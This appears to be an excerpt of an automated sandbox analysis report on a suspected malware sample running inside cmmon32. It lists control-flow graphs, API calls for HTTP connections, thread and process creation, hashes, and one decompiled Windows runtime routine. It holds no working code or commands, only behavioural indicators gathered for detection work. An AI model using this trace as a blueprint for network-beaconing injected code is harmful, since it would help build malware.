                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 107 1baa60-1baa96 108 1baa9f-1baaa6 107->108 109 1baa9a call 1bb000 107->109 110 1baaa8-1baace HttpOpenRequestA 108->110 111 1baacf-1baad5 108->111 109->108
                                          APIs
                                          • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 001BAAC8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpOpenRequest
                                          • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                          • API String ID: 1984915467-4016285707
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 112 1baa59-1baaa6 call 1bb000 115 1baaa8-1baace HttpOpenRequestA 112->115 116 1baacf-1baad5 112->116
                                          APIs
                                          • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 001BAAC8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpOpenRequest
                                          • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                          • API String ID: 1984915467-4016285707
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 117 1baae0-1bab16 118 1bab1f-1bab26 117->118 119 1bab1a call 1bb000 117->119 120 1bab28-1bab42 HttpSendRequestA 118->120 121 1bab43-1bab49 118->121 119->118
                                          APIs
                                          • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 001BAB3C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpRequestSend
                                          • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                          • API String ID: 360639707-2503632690
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 122 1baad6-1bab26 call 1bb000 125 1bab28-1bab42 HttpSendRequestA 122->125 126 1bab43-1bab49 122->126
                                          APIs
                                          • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 001BAB3C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpRequestSend
                                          • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                          • API String ID: 360639707-2503632690
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 127 1ba9e0-1baa16 128 1baa1f-1baa26 127->128 129 1baa1a call 1bb000 127->129 130 1baa28-1baa4e InternetConnectA 128->130 131 1baa4f-1baa55 128->131 129->128
                                          APIs
                                          • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 001BAA48
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ConnectInternet
                                          • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                          • API String ID: 3050416762-1024195942
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 132 1ba9d5-1baa26 call 1bb000 135 1baa28-1baa4e InternetConnectA 132->135 136 1baa4f-1baa55 132->136
                                          APIs
                                          • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 001BAA48
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ConnectInternet
                                          • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                          • API String ID: 3050416762-1024195942
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 137 1ba970-1ba9b1 call 1bb000 140 1ba9ce-1ba9d4 137->140 141 1ba9b3-1ba9cd InternetOpenA 137->141
                                          APIs
                                          • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 001BA9C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InternetOpen
                                          • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                          • API String ID: 2038078732-3155091674
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 386 1b9070-1b90b2 call 1bbd30 389 1b90b8-1b9108 call 1bbe00 call 1aace0 call 1b4e40 386->389 390 1b918c-1b9192 386->390 397 1b9110-1b9121 Sleep 389->397 398 1b9123-1b9129 397->398 399 1b9186-1b918a 397->399 400 1b912b-1b914c call 1b8c90 398->400 401 1b9153-1b9174 call 1b8ea0 398->401 399->390 399->397 404 1b9151 400->404 405 1b9179-1b917c 401->405 404->405 405->399
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 001B9118
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 406 1b9066-1b909f 407 1b90ab-1b90b2 406->407 408 1b90a6 call 1bbd30 406->408 409 1b90b8-1b9108 call 1bbe00 call 1aace0 call 1b4e40 407->409 410 1b918c-1b9192 407->410 408->407 417 1b9110-1b9121 Sleep 409->417 418 1b9123-1b9129 417->418 419 1b9186-1b918a 417->419 420 1b912b-1b9151 call 1b8c90 418->420 421 1b9153-1b9174 call 1b8ea0 418->421 419->410 419->417 425 1b9179-1b917c 420->425 421->425 425->419
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 001B9118
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 426 1b9194-1b9196 427 1b9139-1b914b 426->427 428 1b9198-1b91c8 call 1b4e40 426->428 429 1b9151 427->429 430 1b914c call 1b8c90 427->430 435 1b91ca-1b91e6 call 1bf102 CreateThread 428->435 436 1b91e7-1b91ec 428->436 432 1b9179-1b917c 429->432 430->429 434 1b9186-1b918a 432->434 437 1b918c-1b9192 434->437 438 1b9110-1b9121 Sleep 434->438 438->434 440 1b9123-1b9129 438->440 442 1b912b-1b914c call 1b8c90 440->442 443 1b9153-1b9174 call 1b8ea0 440->443 442->429 443->432
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,001AF040,?,?,00000000), ref: 001B91DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID: net.dll
                                          • API String ID: 2422867632-2431746569
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,001A3AF8), ref: 001BA68D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,001A3AF8), ref: 001BA68D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001A836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001A838B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001A836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001A838B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 001AAD52
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001BA724
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001BA724
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,001AF040,?,?,00000000), ref: 001B91DC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(001B4526,?,001B4C9F,001B4C9F,?,001B4526,?,?,?,?,?,00000000,00000000,?), ref: 001BA64D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,001AF1C2,001AF1C2,?,00000000,?,?), ref: 001BA7F0
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction ID: 1a72bdfc169caeca1c658b422257f2e17e797c1a9c34319cf547b129b0904d62
                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction Fuzzy Hash: 4CE01AB12002086BDB10DF49CC85EEB37ADAF88650F018154FA0C57241CA30E8108BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,001A8D14,?), ref: 001AF6EB
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 52ede49fd32d6eb30e3a2b7ff44ce5cfddb0291d4e702fb4a6f74a76688b7aa1
                                          • Instruction ID: 4aaceeaa8748ae459e82b939d2aca95fabbe2ce2450681a2c0156c3893517c44
                                          • Opcode Fuzzy Hash: 52ede49fd32d6eb30e3a2b7ff44ce5cfddb0291d4e702fb4a6f74a76688b7aa1
                                          • Instruction Fuzzy Hash: 20D05EB76902042EE614FAE4AC17FAB739D6B52744F19407AF509EA1C3DA54D1018564
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,001A8D14,?), ref: 001AF6EB
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                          • Instruction ID: ae9e4205f4bdff272605147e70e9df6608f2a5ffb11a6dc0491b4323a1d255c2
                                          • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                          • Instruction Fuzzy Hash: 2ED05E666503042BE610BAA49C03F6632886B55B00F494074F948972C3DA54E4014165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 0beca5b0276a96b906e552d6a344463005a60b6b81993a3e25c4a2528e14de93
                                          • Instruction ID: 6c2a1e8ae94e857aef5b6090bb3cd6457747166f520163deaffc7d7ad27ea93f
                                          • Opcode Fuzzy Hash: 0beca5b0276a96b906e552d6a344463005a60b6b81993a3e25c4a2528e14de93
                                          • Instruction Fuzzy Hash: 82B02BB18010C0C5FB00E760460871B394077C0300F12C011D1020280A073CD090F1B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E045EFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                          				void* _t7;
                                          				intOrPtr _t9;
                                          				intOrPtr _t10;
                                          				intOrPtr* _t12;
                                          				intOrPtr* _t13;
                                          				intOrPtr _t14;
                                          				intOrPtr* _t15;
                                          
                                          				_t13 = __edx;
                                          				_push(_a4);
                                          				_t14 =  *[fs:0x18];
                                          				_t15 = _t12;
                                          				_t7 = E0459CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                          				_push(_t13);
                                          				E045E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                          				_t9 =  *_t15;
                                          				if(_t9 == 0xffffffff) {
                                          					_t10 = 0;
                                          				} else {
                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                          				}
                                          				_push(_t10);
                                          				_push(_t15);
                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                          				return E045E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                          			}











                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 045EFDFA
                                          Strings
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 045EFE01
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 045EFE2B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 1a04cd88c3ff8acc671ea25296420e4b613a8ef22fef8f8b95571a5c6396112a
                                          • Instruction ID: 903fe4ed506def4b7243de5ee9b5944b594fe89c4ea1a4f2fb5ea6be606c744d
                                          • Opcode Fuzzy Hash: 1a04cd88c3ff8acc671ea25296420e4b613a8ef22fef8f8b95571a5c6396112a
                                          • Instruction Fuzzy Hash: 97F0FC762002017FE6251A86DC01F337B5AFB84774F140354F6185A1D1EA62FC30E6F4
                                          Uniqueness

                                          Uniqueness Score: -1.00%